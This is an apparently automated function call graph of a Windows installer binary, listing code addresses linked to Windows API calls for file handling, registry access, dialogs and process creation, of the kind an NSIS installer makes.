402f35 4495->4496 4497 402e98 GlobalAlloc 4495->4497 4500 4062a3 11 API calls 4496->4500 4498 402eb1 4497->4498 4499 402f2c CloseHandle 4497->4499 4518 403368 SetFilePointer 4498->4518 4499->4496 4502 402f45 4500->4502 4504 402f50 DeleteFileW 4502->4504 4505 402f63 4502->4505 4503 402eb7 4507 403336 ReadFile 4503->4507 4504->4505 4519 401435 4505->4519 4508 402ec0 GlobalAlloc 4507->4508 4509 402ed0 4508->4509 4510 402f04 WriteFile GlobalFree 4508->4510 4511 40337f 37 API calls 4509->4511 4512 40337f 37 API calls 4510->4512 4516 402edd 4511->4516 4513 402f29 4512->4513 4513->4499 4515 402efb GlobalFree 4515->4510 4516->4515 4517->4495 4518->4503 4520 404f72 25 API calls 4519->4520 4521 401443 4520->4521 4522 401cd5 4523 401446 18 API calls 4522->4523 4524 401cdd 4523->4524 4525 401446 18 API calls 4524->4525 4526 401ce8 4525->4526 4527 40145c 18 API calls 4526->4527 4528 401cf1 4527->4528 4529 401d07 lstrlenW 4528->4529 4530 401d43 4528->4530 4531 401d11 4529->4531 4531->4530 4535 406009 lstrcpynW 4531->4535 4533 401d2c 4533->4530 4534 401d39 lstrlenW 4533->4534 4534->4530 4535->4533 4536 403cd6 4537 403ce1 4536->4537 4538 403ce5 4537->4538 4539 403ce8 GlobalAlloc 4537->4539 4539->4538 4540 402cd7 4541 401446 18 API calls 4540->4541 4544 402c64 4541->4544 4542 402d99 4543 402d17 ReadFile 4543->4544 4544->4540 4544->4542 4544->4543 4545 402dd8 4546 4030e3 4545->4546 4547 402ddf 4545->4547 4548 402de5 FindClose 4547->4548 4548->4546 4549 401d5c 4550 40145c 18 API calls 4549->4550 4551 401d63 4550->4551 4552 40145c 18 API calls 4551->4552 4553 401d6c 4552->4553 4554 401d73 lstrcmpiW 4553->4554 4555 401d86 lstrcmpW 4553->4555 4556 401d79 4554->4556 4555->4556 4557 401c99 4555->4557 4556->4555 4556->4557 4262 407c5f 4263 407344 4262->4263 4264 4073c2 GlobalFree 4263->4264 4265 4073cb GlobalAlloc 4263->4265 4266 407c6d 4263->4266 4267 407443 GlobalAlloc 4263->4267 4268 40743a GlobalFree 4263->4268 4264->4265 4265->4263 4265->4266 4267->4263 4267->4266 4268->4267 4558 404363 4559 404373 4558->4559 4560 40439c 4558->4560 4561 403d3f 19 API calls 4559->4561 4562 403dca 8 API calls 4560->4562 4563 404380 SetDlgItemTextW 4561->4563 4564 4043a8 4562->4564 4563->4560 4565 4027e3 4566 4027e9 4565->4566 4567 4027f2 4566->4567 4568 402836 4566->4568 4581 401553 4567->4581 4569 40145c 18 API calls 4568->4569 4571 40283d 4569->4571 4573 4062a3 11 API calls 4571->4573 4572 4027f9 4575 40145c 18 API calls 4572->4575 4579 401a13 4572->4579 4574 40284d 4573->4574 4585 40149d RegOpenKeyExW 4574->4585 4576 40280a RegDeleteValueW 4575->4576 4577 4062a3 11 API calls 4576->4577 4580 40282a RegCloseKey 4577->4580 4580->4579 4582 401563 4581->4582 4583 40145c 18 API calls 4582->4583 4584 401589 RegOpenKeyExW 4583->4584 4584->4572 4590 4014c9 4585->4590 4594 401515 4585->4594 4586 4014ef RegEnumKeyW 4587 401501 RegCloseKey 4586->4587 4586->4590 4588 4062fc 3 API calls 4587->4588 4592 401511 4588->4592 4589 401526 RegCloseKey 4589->4594 4590->4586 4590->4587 4590->4589 4591 40149d 3 API calls 4590->4591 4591->4590 4593 401541 RegDeleteKeyW 4592->4593 4592->4594 4593->4594 4594->4579 4595 403f64 4596 403f90 4595->4596 4597 403f74 4595->4597 4599 403fc3 4596->4599 4600 403f96 SHGetPathFromIDListW 4596->4600 4606 405c84 GetDlgItemTextW 4597->4606 4602 403fad SendMessageW 4600->4602 4603 403fa6 4600->4603 4601 403f81 SendMessageW 4601->4596 4602->4599 4605 40141d 79 API calls 4603->4605 4605->4602 4606->4601 4607 402ae4 4608 4030e3 4607->4608 4609 402aeb 4607->4609 4610 402af2 CloseHandle 4609->4610 4610->4608 4611 402065 4612 401446 18 API calls 4611->4612 4613 40206d 4612->4613 4614 401446 18 API calls 4613->4614 4615 402076 GetDlgItem 4614->4615 4616 4030dc 4615->4616 4617 4030e3 4616->4617 4619 405f51 wsprintfW 4616->4619 4619->4617 4620 402665 4621 40145c 18 API calls 4620->4621 4622 40266b 4621->4622 4623 40145c 18 API calls 4622->4623 4624 402674 4623->4624 4625 40145c 18 API calls 4624->4625 4626 40267d 4625->4626 4627 4062a3 11 API calls 4626->4627 4628 40268c 4627->4628 4629 4062d5 2 API calls 4628->4629 4633 402695 4629->4633 4630 4026a6 lstrlenW lstrlenW 4632 404f72 25 API calls 4630->4632 4631 404f72 25 API calls 4631->4633 4634 4026e8 SHFileOperationW 4632->4634 4633->4630 4633->4631 4635 4030e3 4633->4635 4634->4633 4634->4635 4643 401c69 4644 40145c 18 API calls 4643->4644 4645 401c70 4644->4645 4646 4062a3 11 API calls 4645->4646 4647 401c80 4646->4647 4648 405ca0 MessageBoxIndirectW 4647->4648 4649 401a13 4648->4649 4657 402f6e 4658 402f72 4657->4658 4659 402fae 4657->4659 4661 4062a3 11 API calls 4658->4661 4660 40145c 18 API calls 4659->4660 4667 402f9d 4660->4667 4662 402f7d 4661->4662 4663 4062a3 11 API calls 4662->4663 4664 402f90 4663->4664 4665 402fa2 4664->4665 4666 402f98 4664->4666 4669 4060e7 9 API calls 4665->4669 4668 403e74 5 API calls 4666->4668 4668->4667 4669->4667 4670 4023f0 4671 402403 4670->4671 4684 4024da 4670->4684 4672 40145c 18 API calls 4671->4672 4674 40240a 4672->4674 4673 404f72 25 API calls 4679 4024f1 4673->4679 4675 40145c 18 API calls 4674->4675 4676 402413 4675->4676 4677 402429 LoadLibraryExW 4676->4677 4678 40241b GetModuleHandleW 4676->4678 4680 40243e 4677->4680 4681 4024ce 4677->4681 4678->4677 4678->4680 4694 406365 GlobalAlloc WideCharToMultiByte 4680->4694 4682 404f72 25 API calls 4681->4682 4682->4684 4684->4673 4685 402449 4686 40248c 4685->4686 4687 40244f 4685->4687 4688 404f72 25 API calls 4686->4688 4690 401435 25 API calls 4687->4690 4692 40245f 4687->4692 4689 402496 4688->4689 4691 4062a3 11 API calls 4689->4691 4690->4692 4691->4692 4692->4679 4693 4024c0 FreeLibrary 4692->4693 4693->4679 4695 406390 GetProcAddress 4694->4695 4696 40639d GlobalFree 4694->4696 4695->4696 4696->4685 4697 402df3 4698 402dfa 4697->4698 4700 4019ec 4697->4700 4699 402e07 FindNextFileW 4698->4699 4699->4700 4701 402e16 4699->4701 4703 406009 lstrcpynW 4701->4703 4703->4700 4083 402175 4084 401446 18 API calls 4083->4084 4085 40217c 4084->4085 4086 401446 18 API calls 4085->4086 4087 402186 4086->4087 4090 4062a3 11 API calls 4087->4090 4092 402197 4087->4092 4088 4021aa EnableWindow 4091 4030e3 4088->4091 4089 40219f ShowWindow 4089->4091 4090->4092 4092->4088 4092->4089 4711 404077 4712 404081 4711->4712 4713 404084 lstrcpynW lstrlenW 4711->4713 4712->4713 4109 405479 4110 405491 4109->4110 4111 4055cd 4109->4111 4110->4111 4112 40549d 4110->4112 4113 40561e 4111->4113 4114 4055de GetDlgItem GetDlgItem 4111->4114 4115 4054a8 SetWindowPos 4112->4115 4116 4054bb 4112->4116 4121 40139d 79 API calls 4113->4121 4144 405650 4113->4144 4117 403d3f 19 API calls 4114->4117 4115->4116 4118 4054c0 ShowWindow 4116->4118 4119 4054d8 4116->4119 4120 405608 SetClassLongW 4117->4120 4118->4119 4122 4054e0 DestroyWindow 4119->4122 4123 4054fa 4119->4123 4124 40141d 79 API calls 4120->4124 4121->4144 4127 4058dc 4122->4127 4125 405510 4123->4125 4126 4054ff SetWindowLongW 4123->4126 4124->4113 4130 40551c GetDlgItem 4125->4130 4135 405551 4125->4135 4136 4055c8 4126->4136 4132 40590d ShowWindow 4127->4132 4127->4136 4128 40141d 79 API calls 4128->4144 4129 4058de KiUserCallbackDispatcher KiUserCallbackDispatcher 4129->4127 4133 40552f IsWindowEnabled 4130->4133 4139 40554c 4130->4139 4132->4136 4133->4136 4133->4139 4134 406805 18 API calls 4134->4144 4172 403dca 4135->4172 4138 403d3f 19 API calls 4138->4144 4139->4135 4140 405574 4139->4140 4141 405589 4139->4141 4143 40141d 79 API calls 4140->4143 4142 40141d 79 API calls 4141->4142 4142->4135 4143->4135 4144->4128 4144->4129 4144->4134 4144->4136 4144->4138 4159 40581e DestroyWindow 4144->4159 4167 403d3f 4144->4167 4146 405705 GetDlgItem 4147 405723 ShowWindow KiUserCallbackDispatcher 4146->4147 4148 40571a 4146->4148 4170 403d85 KiUserCallbackDispatcher 4147->4170 4148->4147 4150 40574d EnableWindow 4153 405761 4150->4153 4151 405766 GetSystemMenu EnableMenuItem SendMessageW 4152 405796 SendMessageW 4151->4152 4151->4153 4152->4153 4153->4151 4171 406009 lstrcpynW 4153->4171 4155 4057c4 lstrlenW 4156 406805 18 API calls 4155->4156 4157 4057da SetWindowTextW 4156->4157 4158 40139d 79 API calls 4157->4158 4158->4144 4159->4127 4160 405838 CreateDialogParamW 4159->4160 4160->4127 4161 40586b 4160->4161 4162 403d3f 19 API calls 4161->4162 4163 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4162->4163 4164 40139d 79 API calls 4163->4164 4165 4058bc 4164->4165 4165->4136 4166 4058c4 ShowWindow 4165->4166 4166->4127 4168 406805 18 API calls 4167->4168 4169 403d4a SetDlgItemTextW 4168->4169 4169->4146 4170->4150 4171->4155 4173 403e68 4172->4173 4174 403ddf GetWindowLongW 4172->4174 4173->4136 4174->4173 4175 403df0 4174->4175 4176 403e02 4175->4176 4177 403dff GetSysColor 4175->4177 4178 403e12 SetBkMode 4176->4178 4179 403e08 SetTextColor 4176->4179 4177->4176 4180 403e30 4178->4180 4181 403e2a GetSysColor 4178->4181 4179->4178 4182 403e41 4180->4182 4183 403e37 SetBkColor 4180->4183 4181->4180 4182->4173 4184 403e54 DeleteObject 4182->4184 4185 403e5b CreateBrushIndirect 4182->4185 4183->4182 4184->4185 4185->4173 4714 4020f9 GetDC GetDeviceCaps 4715 401446 18 API calls 4714->4715 4716 402116 MulDiv 4715->4716 4717 401446 18 API calls 4716->4717 4718 40212c 4717->4718 4719 406805 18 API calls 4718->4719 4720 402165 CreateFontIndirectW 4719->4720 4721 4030dc 4720->4721 4722 4030e3 4721->4722 4724 405f51 wsprintfW 4721->4724 4724->4722 4725 4024fb 4726 40145c 18 API calls 4725->4726 4727 402502 4726->4727 4728 40145c 18 API calls 4727->4728 4729 40250c 4728->4729 4730 40145c 18 API calls 4729->4730 4731 402515 4730->4731 4732 40145c 18 API calls 4731->4732 4733 40251f 4732->4733 4734 40145c 18 API calls 4733->4734 4735 402529 4734->4735 4736 40253d 4735->4736 4737 40145c 18 API calls 4735->4737 4738 4062a3 11 API calls 4736->4738 4737->4736 4739 40256a CoCreateInstance 4738->4739 4740 40258c 4739->4740 4741 40497c GetDlgItem GetDlgItem 4742 4049d2 7 API calls 4741->4742 4752 404be2 4741->4752 4743 404a76 DeleteObject 4742->4743 4744 404a6a SendMessageW 4742->4744 4745 404a81 4743->4745 4744->4743 4747 404ab8 4745->4747 4749 406805 18 API calls 4745->4749 4746 404ccf 4748 404d74 4746->4748 4754 404d1e SendMessageW 4746->4754 4781 404bdd 4746->4781 4753 403d3f 19 API calls 4747->4753 4750 404d89 4748->4750 4751 404d7d SendMessageW 4748->4751 4756 404a9a SendMessageW SendMessageW 4749->4756 4763 404da2 4750->4763 4764 404d9b ImageList_Destroy 4750->4764 4769 404db2 4750->4769 4751->4750 4752->4746 4758 40484e 5 API calls 4752->4758 4771 404c5a 4752->4771 4759 404acc 4753->4759 4761 404d33 SendMessageW 4754->4761 4754->4781 4755 403dca 8 API calls 4762 404f6b 4755->4762 4756->4745 4757 404cc1 SendMessageW 4757->4746 4758->4771 4765 403d3f 19 API calls 4759->4765 4760 404f1c 4770 404f31 ShowWindow GetDlgItem ShowWindow 4760->4770 4760->4781 4766 404d46 4761->4766 4767 404dab GlobalFree 4763->4767 4763->4769 4764->4763 4768 404add 4765->4768 4775 404d57 SendMessageW 4766->4775 4767->4769 4772 404baa GetWindowLongW SetWindowLongW 4768->4772 4777 404b39 SendMessageW 4768->4777 4778 404ba4 4768->4778 4779 404b67 SendMessageW 4768->4779 4780 404b7b SendMessageW 4768->4780 4769->4760 4774 40141d 79 API calls 4769->4774 4785 404de4 4769->4785 4770->4781 4771->4746 4771->4757 4773 404bc4 4772->4773 4773->4752 4776 404bca ShowWindow 4773->4776 4774->4785 4775->4748 4776->4781 4777->4768 4778->4772 4778->4773 4779->4768 4780->4768 4781->4755 4782 404ef3 InvalidateRect 4782->4760 4783 404f09 4782->4783 4789 4043ad 4783->4789 4784 404e12 SendMessageW 4788 404e28 4784->4788 4785->4784 4785->4788 4787 404ea1 SendMessageW SendMessageW 4787->4788 4788->4782 4788->4787 4790 4043cd 4789->4790 4791 406805 18 API calls 4790->4791 4792 40440d 4791->4792 4793 406805 18 API calls 4792->4793 4794 404418 4793->4794 4795 406805 18 API calls 4794->4795 4796 404428 lstrlenW wsprintfW SetDlgItemTextW 4795->4796 4796->4760 4797 4026fc 4798 401ee4 4797->4798 4800 402708 4797->4800 4798->4797 4799 406805 18 API calls 4798->4799 4799->4798 4257 4019fd 4258 40145c 18 API calls 4257->4258 4259 401a04 4258->4259 4260 405e7f 2 API calls 4259->4260 4261 401a0b 4260->4261 4801 4022fd 4802 40145c 18 API calls 4801->4802 4803 402304 GetFileVersionInfoSizeW 4802->4803 4804 4030e3 4803->4804 4805 40232b GlobalAlloc 4803->4805 4805->4804 4806 40233f GetFileVersionInfoW 4805->4806 4807 402350 VerQueryValueW 4806->4807 4808 402381 GlobalFree 4806->4808 4807->4808 4809 402369 4807->4809 4808->4804 4814 405f51 wsprintfW 4809->4814 4812 402375 4815 405f51 wsprintfW 4812->4815 4814->4812 4815->4808 4816 402afd 4817 40145c 18 API calls 4816->4817 4818 402b04 4817->4818 4823 405e50 GetFileAttributesW CreateFileW 4818->4823 4820 402b10 4821 4030e3 4820->4821 4824 405f51 wsprintfW 4820->4824 4823->4820 4824->4821 4825 4029ff 4826 401553 19 API calls 4825->4826 4827 402a09 4826->4827 4828 40145c 18 API calls 4827->4828 4829 402a12 4828->4829 4830 402a1f RegQueryValueExW 4829->4830 4835 401a13 4829->4835 4831 402a45 4830->4831 4832 402a3f 4830->4832 4834 4029e4 RegCloseKey 4831->4834 4831->4835 4832->4831 4836 405f51 wsprintfW 4832->4836 4834->4835 4836->4831 4837 401000 4838 401037 BeginPaint GetClientRect 4837->4838 4840 40100c DefWindowProcW 4837->4840 4841 4010fc 4838->4841 4842 401182 4840->4842 4843 401073 CreateBrushIndirect FillRect DeleteObject 4841->4843 4844 401105 4841->4844 4843->4841 4845 401170 EndPaint 4844->4845 4846 40110b CreateFontIndirectW 4844->4846 4845->4842 4846->4845 4847 40111b 6 API calls 4846->4847 4847->4845 4848 401f80 4849 401446 18 API calls 4848->4849 4850 401f88 4849->4850 4851 401446 18 API calls 4850->4851 4852 401f93 4851->4852 4853 401fa3 4852->4853 4854 40145c 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4859 401fb3 4853->4859 4854->4853 4855->4859 4856 402006 4858 40145c 18 API calls 4856->4858 4857 401fbc 4860 401446 18 API calls 4857->4860 4861 40200d 4858->4861 4859->4856 4859->4857 4862 401fc4 4860->4862 4863 40145c 18 API calls 4861->4863 4864 401446 18 API calls 4862->4864 4865 402016 FindWindowExW 4863->4865 4866 401fce 4864->4866 4869 401ff6 4865->4869 4867 401fd8 SendMessageTimeoutW 4866->4867 4866->4869 4867->4869 4868 4030e3 4869->4868 4871 405f51 wsprintfW 4869->4871 4871->4868 4872 402880 4873 402884 4872->4873 4874 40145c 18 API calls 4873->4874 4875 4028a7 4874->4875 4876 40145c 18 API calls 4875->4876 4877 4028b1 4876->4877 4878 4028ba RegCreateKeyExW 4877->4878 4879 4028e8 4878->4879 4886 4029ef 4878->4886 4880 402934 4879->4880 4881 40145c 18 API calls 4879->4881 4882 402963 4880->4882 4885 401446 18 API calls 4880->4885 4884 4028fc lstrlenW 4881->4884 4883 4029ae RegSetValueExW 4882->4883 4887 40337f 37 API calls 4882->4887 4890 4029c6 RegCloseKey 4883->4890 4891 4029cb 4883->4891 4888 402918 4884->4888 4889 40292a 4884->4889 4892 402947 4885->4892 4893 40297b 4887->4893 4894 4062a3 11 API calls 4888->4894 4895 4062a3 11 API calls 4889->4895 4890->4886 4896 4062a3 11 API calls 4891->4896 4897 4062a3 11 API calls 4892->4897 4903 406224 4893->4903 4902 402922 4894->4902 4895->4880 4896->4890 4897->4882 4901 4062a3 11 API calls 4901->4902 4902->4883 4904 406247 4903->4904 4905 40625c wsprintfW 4904->4905 4908 40628a 4904->4908 4905->4905 4905->4908 4906 402991 4906->4901 4907 406293 lstrcatW 4907->4906 4908->4906 4908->4907 4909 402082 4910 401446 18 API calls 4909->4910 4911 402093 SetWindowLongW 4910->4911 4912 4030e3 4911->4912 3473 403883 #17 SetErrorMode OleInitialize 3547 4062fc GetModuleHandleA 3473->3547 3477 4038f1 GetCommandLineW 3552 406009 lstrcpynW 3477->3552 3479 403903 GetModuleHandleW 3480 40391b 3479->3480 3553 405d06 3480->3553 3483 4039d6 3484 4039f5 GetTempPathW 3483->3484 3557 4037cc 3484->3557 3486 403a0b 3487 403a33 DeleteFileW 3486->3487 3488 403a0f GetWindowsDirectoryW lstrcatW 3486->3488 3565 403587 GetTickCount GetModuleFileNameW 3487->3565 3490 4037cc 11 API calls 3488->3490 3489 405d06 CharNextW 3497 40393c 3489->3497 3492 403a2b 3490->3492 3492->3487 3494 403acc 3492->3494 3493 403a47 3493->3494 3495 403ab1 3493->3495 3498 405d06 CharNextW 3493->3498 3650 403859 3494->3650 3593 40592c 3495->3593 3497->3483 3497->3489 3504 4039d8 3497->3504 3510 403a5e 3498->3510 3501 403ac1 3678 4060e7 3501->3678 3502 403ae1 3657 405ca0 3502->3657 3503 403bce 3506 403c51 3503->3506 3508 4062fc 3 API calls 3503->3508 3661 406009 lstrcpynW 3504->3661 3512 403bdd 3508->3512 3513 403af7 lstrcatW lstrcmpiW 3510->3513 3514 403a89 3510->3514 3515 4062fc 3 API calls 3512->3515 3513->3494 3517 403b13 CreateDirectoryW SetCurrentDirectoryW 3513->3517 3662 40677e 3514->3662 3518 403be6 3515->3518 3520 403b36 3517->3520 3521 403b2b 3517->3521 3523 4062fc 3 API calls 3518->3523 3692 406009 lstrcpynW 3520->3692 3691 406009 lstrcpynW 3521->3691 3526 403bef 3523->3526 3525 403b44 3693 406009 lstrcpynW 3525->3693 3529 403c3d ExitWindowsEx 3526->3529 3535 403bfd GetCurrentProcess 3526->3535 3529->3506 3532 403c4a 3529->3532 3530 403aa6 3677 406009 lstrcpynW 3530->3677 3531 403b53 3539 403bc2 3531->3539 3544 406805 18 API calls 3531->3544 3546 403bad CloseHandle 3531->3546 3694 406805 3531->3694 3713 406c68 3531->3713 3718 405c3f CreateProcessW 3531->3718 3721 40141d 3532->3721 3541 403c0d 3535->3541 3538 403b79 CopyFileW 3538->3531 3540 406c68 42 API calls 3539->3540 3543 403bc9 3540->3543 3541->3529 3543->3494 3544->3531 3546->3531 3548 406314 LoadLibraryA 3547->3548 3549 40631f GetProcAddress 3547->3549 3548->3549 3550 4038c6 SHGetFileInfoW 3548->3550 3549->3550 3551 406009 lstrcpynW 3550->3551 3551->3477 3552->3479 3554 405d0c 3553->3554 3555 40392a CharNextW 3554->3555 3556 405d13 CharNextW 3554->3556 3555->3497 3556->3554 3724 406038 3557->3724 3559 4037e2 3559->3486 3560 4037d8 3560->3559 3733 406722 lstrlenW CharPrevW 3560->3733 3740 405e50 GetFileAttributesW CreateFileW 3565->3740 3567 4035c7 3587 4035d7 3567->3587 3741 406009 lstrcpynW 3567->3741 3569 4035ed 3742 406751 lstrlenW 3569->3742 3573 4035fe GetFileSize 3574 4036fa 3573->3574 3592 403615 3573->3592 3749 4032d2 3574->3749 3576 403703 3578 40373f GlobalAlloc 3576->3578 3576->3587 3783 403368 SetFilePointer 3576->3783 3760 403368 SetFilePointer 3578->3760 3581 4037bd 3584 4032d2 6 API calls 3581->3584 3582 40375a 3761 40337f 3582->3761 3583 403720 3586 403336 ReadFile 3583->3586 3584->3587 3588 40372b 3586->3588 3587->3493 3588->3578 3588->3587 3589 4032d2 6 API calls 3589->3592 3590 403766 3590->3587 3590->3590 3591 403794 SetFilePointer 3590->3591 3591->3587 3592->3574 3592->3581 3592->3587 3592->3589 3747 403336 ReadFile 3592->3747 3594 4062fc 3 API calls 3593->3594 3595 405940 3594->3595 3596 405946 3595->3596 3597 405958 3595->3597 3822 405f51 wsprintfW 3596->3822 3823 405ed3 RegOpenKeyExW 3597->3823 3601 4059a8 lstrcatW 3602 405956 3601->3602 3807 403e95 3602->3807 3603 405ed3 3 API calls 3603->3601 3606 40677e 18 API calls 3607 4059da 3606->3607 3608 405a70 3607->3608 3610 405ed3 3 API calls 3607->3610 3609 40677e 18 API calls 3608->3609 3611 405a76 3609->3611 3612 405a0c 3610->3612 3613 405a86 3611->3613 3614 406805 18 API calls 3611->3614 3612->3608 3616 405a2f lstrlenW 3612->3616 3620 405d06 CharNextW 3612->3620 3615 405aa6 LoadImageW 3613->3615 3829 403e74 3613->3829 3614->3613 3617 405ad1 RegisterClassW 3615->3617 3618 405b66 3615->3618 3621 405a63 3616->3621 3622 405a3d lstrcmpiW 3616->3622 3624 405b19 SystemParametersInfoW CreateWindowExW 3617->3624 3649 405b70 3617->3649 3619 40141d 79 API calls 3618->3619 3625 405b6c 3619->3625 3626 405a2a 3620->3626 3629 406722 3 API calls 3621->3629 3622->3621 3627 405a4d GetFileAttributesW 3622->3627 3624->3618 3633 403e95 19 API calls 3625->3633 3625->3649 3626->3616 3631 405a59 3627->3631 3628 405a9c 3628->3615 3630 405a69 3629->3630 3828 406009 lstrcpynW 3630->3828 3631->3621 3634 406751 2 API calls 3631->3634 3635 405b7d 3633->3635 3634->3621 3636 405b89 ShowWindow LoadLibraryW 3635->3636 3637 405c0c 3635->3637 3639 405ba8 LoadLibraryW 3636->3639 3640 405baf GetClassInfoW 3636->3640 3816 405047 OleInitialize 3637->3816 3639->3640 3642 405bc3 GetClassInfoW RegisterClassW 3640->3642 3643 405bd9 DialogBoxParamW 3640->3643 3641 405c12 3644 405c16 3641->3644 3645 405c2e 3641->3645 3642->3643 3646 40141d 79 API calls 3643->3646 3648 40141d 79 API calls 3644->3648 3644->3649 3647 40141d 79 API calls 3645->3647 3646->3649 3647->3649 3648->3649 3649->3501 3651 403871 3650->3651 3652 403863 CloseHandle 3650->3652 3971 403c83 3651->3971 3652->3651 3658 405cb5 3657->3658 3659 405ccb MessageBoxIndirectW 3658->3659 3660 403aef ExitProcess 3658->3660 3659->3660 3661->3484 4028 406009 lstrcpynW 3662->4028 3664 40678f 3665 405d59 4 API calls 3664->3665 3666 406795 3665->3666 3667 406038 5 API calls 3666->3667 3674 403a97 3666->3674 3673 4067a5 3667->3673 3668 4067dd lstrlenW 3669 4067e4 3668->3669 3668->3673 3671 406722 3 API calls 3669->3671 3670 4062d5 2 API calls 3670->3673 3672 4067ea GetFileAttributesW 3671->3672 3672->3674 3673->3668 3673->3670 3673->3674 3675 406751 2 API calls 3673->3675 3674->3494 3676 406009 lstrcpynW 3674->3676 3675->3668 3676->3530 3677->3495 3679 4060f3 3678->3679 3682 406110 3678->3682 3680 406104 3679->3680 3681 4060fd CloseHandle 3679->3681 3680->3494 3681->3680 3682->3680 3683 406187 3682->3683 3684 40612d 3682->3684 3683->3680 3685 406190 lstrcatW lstrlenW WriteFile 3683->3685 3684->3685 3686 406136 GetFileAttributesW 3684->3686 3685->3680 4029 405e50 GetFileAttributesW CreateFileW 3686->4029 3688 406152 3688->3680 3689 406162 WriteFile 3688->3689 3690 40617c SetFilePointer 3688->3690 3689->3690 3690->3683 3691->3520 3692->3525 3693->3531 3707 406812 3694->3707 3695 406a7f 3696 403b6c DeleteFileW 3695->3696 4032 406009 lstrcpynW 3695->4032 3696->3531 3696->3538 3698 4068d3 GetVersion 3708 4068e0 3698->3708 3699 406a46 lstrlenW 3699->3707 3701 406805 10 API calls 3701->3699 3703 405ed3 3 API calls 3703->3708 3704 406952 GetSystemDirectoryW 3704->3708 3705 406038 5 API calls 3705->3707 3706 406965 GetWindowsDirectoryW 3706->3708 3707->3695 3707->3698 3707->3699 3707->3701 3707->3705 4030 405f51 wsprintfW 3707->4030 4031 406009 lstrcpynW 3707->4031 3708->3703 3708->3704 3708->3706 3708->3707 3709 406999 SHGetSpecialFolderLocation 3708->3709 3710 406805 10 API calls 3708->3710 3711 4069df lstrcatW 3708->3711 3709->3708 3712 4069b1 SHGetPathFromIDListW CoTaskMemFree 3709->3712 3710->3708 3711->3707 3712->3708 3714 4062fc 3 API calls 3713->3714 3716 406c6f 3714->3716 3717 406c90 3716->3717 4033 406a99 lstrcpyW 3716->4033 3717->3531 3719 405c7a 3718->3719 3720 405c6e CloseHandle 3718->3720 3719->3531 3720->3719 3722 40139d 79 API calls 3721->3722 3723 401432 3722->3723 3723->3506 3731 406045 3724->3731 3725 4060bb 3726 4060c1 CharPrevW 3725->3726 3729 4060e1 3725->3729 3726->3725 3727 4060ae CharNextW 3727->3725 3727->3731 3728 405d06 CharNextW 3728->3731 3729->3560 3730 40609a CharNextW 3730->3731 3731->3725 3731->3727 3731->3728 3731->3730 3732 4060a9 CharNextW 3731->3732 3732->3727 3734 4037ea CreateDirectoryW 3733->3734 3735 40673f lstrcatW 3733->3735 3736 405e7f 3734->3736 3735->3734 3737 405e8c GetTickCount GetTempFileNameW 3736->3737 3738 405ec2 3737->3738 3739 4037fe 3737->3739 3738->3737 3738->3739 3739->3486 3740->3567 3741->3569 3743 406760 3742->3743 3744 4035f3 3743->3744 3745 406766 CharPrevW 3743->3745 3746 406009 lstrcpynW 3744->3746 3745->3743 3745->3744 3746->3573 3748 403357 3747->3748 3748->3592 3750 4032f3 3749->3750 3751 4032db 3749->3751 3754 403303 GetTickCount 3750->3754 3755 4032fb 3750->3755 3752 4032e4 DestroyWindow 3751->3752 3753 4032eb 3751->3753 3752->3753 3753->3576 3757 403311 CreateDialogParamW ShowWindow 3754->3757 3758 403334 3754->3758 3784 406332 3755->3784 3757->3758 3758->3576 3760->3582 3763 403398 3761->3763 3762 4033c3 3765 403336 ReadFile 3762->3765 3763->3762 3806 403368 SetFilePointer 3763->3806 3766 4033ce 3765->3766 3767 4033e7 GetTickCount 3766->3767 3768 403518 3766->3768 3770 4033d2 3766->3770 3779 4033fa 3767->3779 3769 40351c 3768->3769 3774 403540 3768->3774 3771 403336 ReadFile 3769->3771 3770->3590 3771->3770 3772 403336 ReadFile 3772->3774 3773 403336 ReadFile 3773->3779 3774->3770 3774->3772 3775 40355f WriteFile 3774->3775 3775->3770 3776 403574 3775->3776 3776->3770 3776->3774 3778 40345c GetTickCount 3778->3779 3779->3770 3779->3773 3779->3778 3780 403485 MulDiv wsprintfW 3779->3780 3782 4034c9 WriteFile 3779->3782 3788 407312 3779->3788 3795 404f72 3780->3795 3782->3770 3782->3779 3783->3583 3785 40634f PeekMessageW 3784->3785 3786 406345 DispatchMessageW 3785->3786 3787 403301 3785->3787 3786->3785 3787->3576 3789 407332 3788->3789 3790 40733a 3788->3790 3789->3779 3790->3789 3791 4073c2 GlobalFree 3790->3791 3792 4073cb GlobalAlloc 3790->3792 3793 407443 GlobalAlloc 3790->3793 3794 40743a GlobalFree 3790->3794 3791->3792 3792->3789 3792->3790 3793->3789 3793->3790 3794->3793 3796 404f8b 3795->3796 3805 40502f 3795->3805 3797 404fa9 lstrlenW 3796->3797 3798 406805 18 API calls 3796->3798 3799 404fd2 3797->3799 3800 404fb7 lstrlenW 3797->3800 3798->3797 3802 404fe5 3799->3802 3803 404fd8 SetWindowTextW 3799->3803 3801 404fc9 lstrcatW 3800->3801 3800->3805 3801->3799 3804 404feb SendMessageW SendMessageW SendMessageW 3802->3804 3802->3805 3803->3802 3804->3805 3805->3779 3806->3762 3808 403ea9 3807->3808 3834 405f51 wsprintfW 3808->3834 3810 403f1d 3811 406805 18 API calls 3810->3811 3812 403f29 SetWindowTextW 3811->3812 3813 403f44 3812->3813 3814 403f5f 3813->3814 3815 406805 18 API calls 3813->3815 3814->3606 3815->3813 3817 40506a 3816->3817 3819 4062a3 11 API calls 3817->3819 3821 405095 3817->3821 3835 40139d 3817->3835 3818 4050a5 OleUninitialize 3818->3641 3819->3817 3821->3818 3822->3602 3824 405f07 RegQueryValueExW 3823->3824 3825 405989 3823->3825 3826 405f29 RegCloseKey 3824->3826 3825->3601 3825->3603 3826->3825 3828->3608 3970 406009 lstrcpynW 3829->3970 3831 403e88 3832 406722 3 API calls 3831->3832 3833 403e8e lstrcatW 3832->3833 3833->3628 3834->3810 3838 4013a4 3835->3838 3836 401410 3836->3817 3838->3836 3839 4013dd MulDiv 3838->3839 3840 4015a0 3838->3840 3839->3838 3841 4015fa 3840->3841 3919 40160c 3840->3919 3842 401601 3841->3842 3843 401742 3841->3843 3844 401962 3841->3844 3845 4019ca 3841->3845 3846 40176e 3841->3846 3847 401650 3841->3847 3848 4017b1 3841->3848 3849 401672 3841->3849 3850 401693 3841->3850 3851 401616 3841->3851 3852 4016d6 3841->3852 3853 401736 3841->3853 3854 401897 3841->3854 3855 4018db 3841->3855 3856 40163c 3841->3856 3857 4016bd 3841->3857 3841->3919 3866 4062a3 11 API calls 3842->3866 3858 401751 ShowWindow 3843->3858 3859 401758 3843->3859 3863 40145c 18 API calls 3844->3863 